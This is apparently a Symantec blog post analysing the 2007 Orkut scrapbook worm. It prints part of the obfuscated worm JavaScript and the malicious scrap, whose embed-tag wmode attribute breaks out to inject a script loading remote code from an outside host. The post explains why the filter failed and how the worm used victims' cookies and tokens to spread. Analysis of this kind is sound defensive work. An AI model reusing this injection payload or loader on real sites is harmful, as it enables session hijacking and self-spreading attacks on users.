The Orkut Worm Has Landed!

Orkut is a popular social networking sitewith millions of registered users. A couple of days ago Orkut was hitwith a worm that impacted close to 700,000 users in approximately 24hours. We took a closer look at the exploit to get an idea of why somany users' systems were infected. The exploit was contained in aJavaScript file, aptly named "virus.js" file, which was injected usingan embed tag. Here is a snippet of the JavaScript file:

function $(p,a,c,k,e,d) {
 e=function(c) {
  return(c35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
 while(c--){d[e(c)]=k[c]||e(c)}
 k=[function(e){return d[e]}];
 e=function(){return'\\w+'};
 c=1
};
while(c--){
 if(k[c]){
  p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
 }
 }
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];
7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?";
m="+m.2f():"")+(c?";
c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);
6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?";
9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);
3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));
f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&
15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);
3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
…

We can see from the above code that the JavaScript is heavilyobfuscated. After decoding and analyzing the strings in the script weconfirmed that it is indeed targeting Orkut users. Our analysis of thedecoded JavaScript showed that when the virus.js script is executed itforces the user to join a community called “Infectados pelo Vírus doOrkut”. The name of this community is in Portuguese and translates to“Infected by Virus Orkut.”

This is a novel way for the author of the worm to keep track ofaccounts infected by the worm. The script then loads the "friends list"of the infected Orkut account and sends them a malicious scrap. Theworm uses Orkut scrap entries as its vector of propagation. Below is anexample of the code to define the Orkut scrap:

2008 vem ai… que ele comece mto bem par avc
<br/>
[silver]RL Wed Dec 19 14:57:48 UTC+0530 2007[/silver]
<br/>
<embed src=http://www.orkut.com/LoL.aspx type=
“application/x-shockwave-flash” wmode=”transparent’);
Script=document.createElement(‘script’);
Script.src=’http://files.myopera111.com/[REMOVED].js’;
Document.getElementByTagname(‘head’)[0].appendChild
(script);escape(‘” width=”1” height=”1”>
</embed>

When you look at the code there are a few attributes for the embedtag, such as wmode, width, height, etc. The embed tag expects theseattributes in order to create a flash object to display the flashcontent. Now when you look closely at the code, notice the wmodeattribute:

wmode=”transparent’);

The author has closed wmode with ‘); and has added some script codein the attribute value itself. Let’s analyze this further. We testedthe script with a variant of the malicious scrap:

“<embed src="http://www.orkut.com/LoL.aspx"type="application/x-shockwave-flash" wmode="transparent” width=”1”height=”1”>”.

When Orkut parsed this scrapbook entry, we found it behaved in a similar way to the following code in an Orkut page:

<script type="text/javascript">
var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx',
   '337533968', '1', '1', '9', '#FFFFFF',
   'autohigh', '', '', '337533968');
flashWriter._addParam('wmode', 'transparent');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');
flashWriter._setAttribute('style', '');
flashWriter._write('flashDiv337533968');</script>

The Orkut application parsed the scrap text and created the flash object with values specified in the scrap.
If we look at the source code of the malicious scrap it looks like thebelow sample (the injected code is marked in bold and red). Note theescape function is added to allow the malicious code to be integrated:

flashWriter._addParam ( 'wmode', 'transparent');
script = document.createElement ( 'script');
script.src='http://files.myopera.com/virusd[REMOVED]';
document.getElementsByTagName ( 'head') [0]. AppendChild script);
escape ('');
flashWriter._addParam ( 'allowNetworking', 'internal');
flashWriter._addParam ( 'allowScriptAccess',' never ');

Based on what we seen so far we can infer that the Orkut applicationfilters failed to parse this attribute in the request. It took thewhole wmode value as is and added it in the rendering code:

flashWriter._addParam('wmode', 'transparent'); (malicious script)

In this way the worm inserts a malicious script using the embed tagand uses it for exploitation. Interestingly, a victim doesn’t need toclick on the scrap. When the scrapbook is loaded the malicious embedflash code loads the virus.js file silently. The JavaScript takes thecookies and tokens of the logged in user and uses it to spread the wormfurther.

This worm illustrates how a simple script injection exploit couldaffect a large social networking site. Remember, users didn’t have toclick anything as the malicious script runs silently as soon as thepage is loaded. This worm could have been used for other maliciouspurposes, such as stealing cookies, exploiting other vulnerabilities,or stealing sensitive data as well.

As of today, the virus.js script is no longer available on the siteand it seems as if there have been adequate checks implemented by Orkutto validate content when posting a scrap. The malicious scraps havealso been deleted from the scrapbook of the infected users.

Symantec has built a number of excellent Web browsing protections into our 2008 product range.
The worm is detected by Symantec's antivirus products with certified definitions of 12/19/2007 rev. 7 and greater as JS.Woorkut.We recommend that you keep your Symantec products up-to-date, patchyour systems, and run your browser with limited options enabled.